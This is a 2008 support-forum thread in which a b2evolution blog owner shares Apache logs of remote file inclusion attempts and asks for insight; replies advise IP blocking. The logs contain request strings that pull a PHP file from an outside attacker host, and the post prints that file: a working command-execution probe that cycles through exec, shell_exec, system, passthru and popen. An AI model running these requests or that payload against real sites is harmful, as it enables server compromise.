Recent Topics
  1. b2evolution CMS Support Forums
  2. b2evolution Support
  3. General Support
  4. [2.x] Apache logs of likely cracker abusing b2evolution.

[2.x] Apache logs of likely cracker abusing b2evolution.

1 Aug 24, 2008 13:49    

My b2evolution Version: 2.x

Below are the records (separated by blank lines) of one of 3 IP addresses that Apache/Debian logged on August 23, 2008. I would appreciate any insight. Thank you.

65.98.70.18 - - [23/Aug/2008:13:04:29 -0700] "GET /blog/index.php/2008/06/02/os-2-w...-business-wseb-and?blog=4/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 400 567 "-" "libwww-perl/5.811"

65.98.70.18 - - [23/Aug/2008:13:04:29 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 46203 "-" "libwww-perl/5.811"

65.98.70.18 - - [23/Aug/2008:13:04:31 -0700] "GET /blog/index.php/2008/06/02/index.php?_SERVER[DOCUMENT_ROOT]=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 - "-" "libwww-perl/5.811"

Digging further, one realizes that http://www.topyn.com/ips.txt is an PHP file (hosted at a porn site --as can be verified) which content I will list below (I used the wget utility to obtain it):
--------------------------------------------
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
-------------------------------------------------

Back to top

2 Aug 24, 2008 14:03

Block the IP 65.98.70.18 in your .htaccess file. Please search Google on how to do that.
I don't believe anything actually happened. They tried to redirect your site. B2evolution is well protected against attacks like these.

Good luck

Back to top

3 Aug 24, 2008 14:18

Afwas,

I appreciate your kind response/advice. In effect I blocked that offending IP address (and 2 others) using iptables. Additionally, I notified the pertinent hosting providers about these crackers.

Below is the corresponding log entry in the Apache error.log file (for informational purposes):

[Sat Aug 23 13:04:31 2008] [error] [client 65.98.70.18] PHP Fatal error: Call to undefined function bad_request_die() in [snip]/blog/inc/_
main.inc.php on line 89

Back to top

4 Aug 25, 2008 09:37

We get thousands of hits from skiddies like that ;)

¥

Back to top

5 Oct 17, 2008 06:22

¥åßßå wrote:

We get thousands of hits from skiddies like that ;)

¥

Thank you for reinforcing the notion that b2evolution can withstand these attacks. On the other hand, I would be interested in knowing what do you do about the incessant poking of your site(s) by these skiddies, ¥åßßå.

I have noticed that these international malicious short interval hits (among others) against my site(s) have increased, and the list of blocked IPs is increasing in my servers' iptables as a direct response to the problem.

How do you handle the annoyance and bandwidth resource misuse by these s(cript)kiddies, as well as site/blog scrapers that drill into your site/blog for several minutes taking with them your site/blog content??? I have had a couple of IPs, during the last month, that have done the latter: 82.80.249.147 and 82.80.249.143

Regards.

Back to top


Form is loading...